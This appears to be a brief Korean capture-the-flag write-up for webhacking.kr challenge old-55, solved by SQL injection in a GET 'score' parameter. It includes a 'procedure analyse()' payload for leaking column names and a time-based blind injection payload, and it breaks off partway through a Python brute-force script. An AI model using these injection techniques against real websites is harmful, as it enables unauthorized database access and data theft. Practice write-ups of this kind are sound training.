[ webhacking.kr ] 55번 old
문제 소스 문제 풀이 - 게임의 rank가 나온다. - score를 눌러보면 get방식을 이용한다. - get파라미터에서 injection이 가능하다. - score=1 limit 2,1 procedure analyse()로 테이블 컬럼명을 알아낸다. - p4ssw0rd_1123581321을 bsqli로 알아낸다. #if(length(p4ssw0rd_1123581321)>0,sleep(5),1) import requests import string import time URL="https://webhacking.kr/challenge/web-31/rank.php" brute=string.digits+string.ascii_letters+string.punctuation cookies={"PHPSESSID..